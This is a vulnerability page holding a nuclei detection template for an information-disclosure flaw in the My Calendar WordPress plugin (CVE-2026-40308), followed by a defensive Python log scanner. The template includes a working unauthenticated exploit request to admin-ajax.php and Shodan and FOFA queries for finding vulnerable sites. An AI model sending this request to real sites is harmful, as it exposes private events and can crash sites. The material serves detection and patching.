My Calendar WordPress Plugin - Information Disclosure

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Unauthenticated users can access private events or crash sites via My Calendar plugin on WordPress multisite.

Code
id: CVE-2026-40308

info:
  name: My Calendar WordPress Plugin - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
    My Calendar WordPress plugin <= 3.7.6 contains an injection vulnerability caused by unvalidated user input passed to parse_str() in mc_ajax_mcjs_action endpoint, letting unauthenticated attackers access or crash sites via switch_to_blog(), exploit requires WordPress Multisite or Single Site setup.
  impact: |
    Unauthenticated attackers can access private events on multisite or cause denial of service on single site installations.
  remediation: |
    Update to version 3.7.7 or later.
  reference:
    - https://github.com/joedolson/my-calendar/security/advisories/GHSA-2mvx-f5qm-v2ch
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40308
  classification:
    cve-id: CVE-2026-40308
    epss-score: 0.00932
    epss-percentile: 0.56327
    cwe-id: CWE-639
  metadata:
    verified: true
    max-request: 2
    vendor: joedolson
    product: my-calendar
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/my-calendar/"
    fofa-query: body="/wp-content/plugins/my-calendar/" && title="WordPress"
  tags: cve,cve2026,wordpress,wp-plugin,my-calendar,idor,information-disclosure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "My Calendar"
          - "Stable tag:"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?m)Stable tag:\s*([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming&args&site=1"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 3.7.6")'
          - 'contains_all(body, "\"success\":1", "response")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a0048304602210090a9e70c1360f66288256592c59b72c140ffcc35c76ae6c5cee669d2c8cd9a4c022100e861ec703949d38000bd7b06f4b81636135e47c333e590a794536802df2fc944:922c64590222798bb761d5b6d8e72950
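As an added defender-side example (not part of the template above or of the Vulners page), the following Python scanner runs over constructed access-log lines and flags requests to the mcjs_action AJAX handler named in the advisory, rating those that also carry a site parameter (the blog-switch input the description refers to) higher than bare calls. The combined log format, the addresses and the severity labels are assumptions.

```python
"""Flag access-log entries that match the request shape tied to CVE-2026-40308."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [04/Jul/2026:03:00:48 +0000] "GET /wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming&args&site=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [04/Jul/2026:03:00:49 +0000] "GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jul/2026:03:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jul/2026:03:01:05 +0000] "GET /wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(line):
    """Return a finding dict for one log line, or None if the line is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # keep_blank_values so a bare "args" key (no value) is still visible in the parse.
    params = parse_qs(parts.query, keep_blank_values=True)
    # Only the admin-ajax handler named in the advisory is relevant.
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    if params.get("action") != ["mcjs_action"]:
        return None
    has_site = "site" in params
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "site_param": has_site,
        # A site parameter on this handler is the stronger signal; a bare call is informational.
        "severity": "high" if has_site else "info",
    }


def scan(log_text):
    """Classify every line of log_text and return the non-empty findings in order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```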
